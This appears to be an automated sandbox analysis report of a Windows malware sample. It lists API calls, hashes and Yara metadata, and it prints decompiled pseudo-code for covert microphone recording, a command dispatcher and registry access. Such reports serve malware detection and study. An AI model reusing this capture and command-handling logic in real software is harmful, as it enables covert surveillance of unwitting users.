                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                                                                • String ID: alarm.wav
                                                                                • API String ID: 3304909635-4094641389
                                                                                • Opcode ID: 9946084532d36ed5acc281a55927049102a21ba0f6fe87ba3c3b11edf66e6487
                                                                                • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                                                                • Opcode Fuzzy Hash: 9946084532d36ed5acc281a55927049102a21ba0f6fe87ba3c3b11edf66e6487
                                                                                • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004124BE, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                                                                • time.MSVCRT ref: 004124E5
                                                                                • srand.MSVCRT ref: 004124F2
                                                                                • rand.MSVCRT ref: 00412506
                                                                                • rand.MSVCRT ref: 0041251A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                                                                Strings
                                                                                • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                                                                • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                • API String ID: 3357298394-1277644989
                                                                                • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                                                                • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                                                                • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                                                                • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B95B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                                                                  • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                                                                • String ID: origmsc
                                                                                • API String ID: 643209241-68016026
                                                                                • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                                                                • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                                                                • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                                                                • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041290A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,000197E8,?,?,0041225E,?), ref: 00412919
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,0041225E,?), ref: 0041296C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@V01@@$?find@?$basic_string@?length@?$basic_string@?replace@?$basic_string@G@1@@V12@
                                                                                • String ID: ^"A
                                                                                • API String ID: 1083762089-1057680782
                                                                                • Opcode ID: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                                                                • Instruction ID: 92156a76a3fbabd4be7b0d6bbce5c3b04c59df92facb318773be45834bd60316
                                                                                • Opcode Fuzzy Hash: 9915cc168a76eb8c27643a4995d50bfb89b5da52f4a242ec9541e0b2919b6f35
                                                                                • Instruction Fuzzy Hash: C201083650051EEFCF049F64EC489ED3BB8FB84355B048564FC16972A0EB70AA55CF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411C4C, Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 15%
                                                                                			E00411C4C(void* __eflags, intOrPtr _a4) {
				char _v20;
				void* _v36;
				char _v52;
				int _t21;
				signed int _t35;
				void* _t39;
				void* _t45;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_t67 = _a4;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t67 + 0x18);
				_t21 = SetEvent( *(_t67 + 0x28));
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t71 = _t69;
				_t45 = _t71;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(_t75,  &_v20,  &_v52, 0x41b310,  &_v52, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t72 = _t71 + 0x24;
				_t61 =  *_t21 - 0x61;
				if(_t61 == 0) {
					_push(E0040180C( &_v20, __eflags, 2));
					_push(E0040180C( &_v20, __eflags, 1));
					_push(E0040180C( &_v20, __eflags, 0));
					_push(_t72 - 0x10);
					E00411D8A(E00412881(_t29));
				} else {
					_t62 = _t61 - 0x3d;
					if(_t62 == 0) {
						E00411A24(_t45);
					} else {
						_t63 = _t62 - 4;
						if(_t63 == 0) {
							_t35 = E0040180C( &_v20, __eflags, 0);
							__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
							__eflags =  *_t35;
							E00411B59(E0040180C( &_v20,  *_t35, 1), _t35 & 0xffffff00 | __eflags != 0x00000000);
						} else {
							_t64 = _t63 - 3;
							if(_t64 == 0) {
								_t39 =  *0x41c1d4;
								__eflags = _t39;
								if(_t39 != 0) {
									SetEvent(_t39);
								}
							} else {
								_t65 = _t64 - 1;
								if(_t65 == 0) {
									 *0x41c1d2 = 1;
								} else {
									if(_t65 == 1) {
										 *0x41c1d3 = 1;
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                                                                0x00411c4c
                                                                                0x00411c53
                                                                                0x00411c5e
                                                                                0x00411c6d
                                                                                0x00411c72
                                                                                0x00411c8a
                                                                                0x00411c9a
                                                                                0x00411ca0
                                                                                0x00411ca6
                                                                                0x00411ca9
                                                                                0x00411cb3
                                                                                0x00411cb8
                                                                                0x00411cbb
                                                                                0x00411cbe
                                                                                0x00411d3c
                                                                                0x00411d47
                                                                                0x00411d57
                                                                                0x00411d58
                                                                                0x00411d60
                                                                                0x00411cc0
                                                                                0x00411cc0
                                                                                0x00411cc3
                                                                                0x00411d2b
                                                                                0x00411cc5
                                                                                0x00411cc5
                                                                                0x00411cc8
                                                                                0x00411d03
                                                                                0x00411d0a
                                                                                0x00411d10
                                                                                0x00411d22
                                                                                0x00411cca
                                                                                0x00411cca
                                                                                0x00411ccd
                                                                                0x00411cee
                                                                                0x00411cf3
                                                                                0x00411cf5
                                                                                0x00411cf8
                                                                                0x00411cf8
                                                                                0x00411ccf
                                                                                0x00411ccf
                                                                                0x00411cd0
                                                                                0x00411ce5
                                                                                0x00411cd2
                                                                                0x00411cd3
                                                                                0x00411cd9
                                                                                0x00411cd9
                                                                                0x00411cd3
                                                                                0x00411cd0
                                                                                0x00411ccd
                                                                                0x00411cc8
                                                                                0x00411cc3
                                                                                0x00411d6b
                                                                                0x00411d73
                                                                                0x00411d7c
                                                                                0x00411d87

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411C5E
                                                                                • SetEvent.KERNEL32(?), ref: 00411C6D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00411C72
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00411C8A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00411C9A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411CA9
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • SetEvent.KERNEL32(?), ref: 00411CF8
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000,00000000), ref: 00411D0A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D73
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00411D7C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@Event$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@A?$basic_string@D@1@@V01@
                                                                                • String ID:
                                                                                • API String ID: 3236006214-0
                                                                                • Opcode ID: 1c6a20819715abfce900e6b93ff025b8969689805c2dba6f51610803d5a8fa04
                                                                                • Instruction ID: c36b53e32b237951d30ffea7710e320f728efbc531e2b869315b9cf17b3ebb74
                                                                                • Opcode Fuzzy Hash: 1c6a20819715abfce900e6b93ff025b8969689805c2dba6f51610803d5a8fa04
                                                                                • Instruction Fuzzy Hash: 5431D872A502089FDB14FBB5EC4AAFE7778FF54300F00442AE502A31F1EA786984CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401519, Relevance: 15.1, APIs: 10, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 47%
                                                                                			E00401519(WCHAR* __eax, void* __eflags) {
				char* _t4;
				signed int _t5;
				CHAR* _t10;
				signed int _t11;
				signed int _t19;
				signed int _t20;
				intOrPtr* _t26;
				void* _t27;

				_t27 = __eflags;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				CreateDirectoryW(__eax, 0);
				0x41b218->wFormatTag = 1;
				 *0x41b21a = 1;
				 *0x41b21c = 0x1f40;
				 *0x41b226 = 8;
				 *0x41b220 = 0x1f40;
				 *0x41b224 = 1;
				 *0x41b228 = 0;
				_t4 = E0040180C(0x41bcb0, _t27, 0x24);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t5 = atoi(_t4);
				_t19 =  *0x41b21c; // 0x0
				 *_t26 = 0x30008;
				_t20 = _t19 * _t5 * 0x3c;
				 *0x41b1d0 = _t20;
				 *0x41b1d8 = (( *0x41b226 & 0x0000ffff) >> 3) * _t20;
				_t10 = waveInOpen(0x41b210, 0xffffffff, 0x41b218, E00401640, 0, ??);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d8);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				0x41b1a0->lpData = _t10;
				_t11 =  *0x41b1d8; // 0x0
				 *0x41b1a4 = _t11;
				 *0x41b1a8 = 0;
				 *0x41b1ac = 0;
				 *0x41b1b0 = 0;
				 *0x41b1b4 = 0;
				waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
				waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
				waveInStart( *0x41b210);
				return 0;
			}











                                                                                0x00401519
                                                                                0x00401523
                                                                                0x0040152a
                                                                                0x0040153c
                                                                                0x00401545
                                                                                0x0040154e
                                                                                0x00401553
                                                                                0x0040155c
                                                                                0x00401561
                                                                                0x0040156a
                                                                                0x00401571
                                                                                0x00401578
                                                                                0x0040157f
                                                                                0x00401588
                                                                                0x0040158e
                                                                                0x00401595
                                                                                0x004015b7
                                                                                0x004015bd
                                                                                0x004015c2
                                                                                0x004015d5
                                                                                0x004015dd
                                                                                0x004015eb
                                                                                0x004015f0
                                                                                0x004015fb
                                                                                0x00401600
                                                                                0x00401606
                                                                                0x0040160c
                                                                                0x00401612
                                                                                0x00401618
                                                                                0x00401627
                                                                                0x00401633
                                                                                0x0040163d

                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00401523
                                                                                • CreateDirectoryW.KERNEL32(00000000), ref: 0040152A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000024), ref: 00401578
                                                                                • atoi.MSVCRT ref: 0040157F
                                                                                • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 004015C2
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60 ref: 004015D5
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004015DD
                                                                                • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 00401618
                                                                                • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 00401627
                                                                                • waveInStart.WINMM ref: 00401633
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@D@2@@std@@D@std@@$?resize@?$basic_string@BufferCreateDirectoryG@2@@std@@G@std@@HeaderOpenPrepareStartatoi
                                                                                • String ID:
                                                                                • API String ID: 1097200658-0
                                                                                • Opcode ID: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                                                                • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                                                                • Opcode Fuzzy Hash: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                                                                • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F153, Relevance: 15.1, APIs: 10, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                                                                • SetEvent.KERNEL32(?), ref: 0040F16D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040F18E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
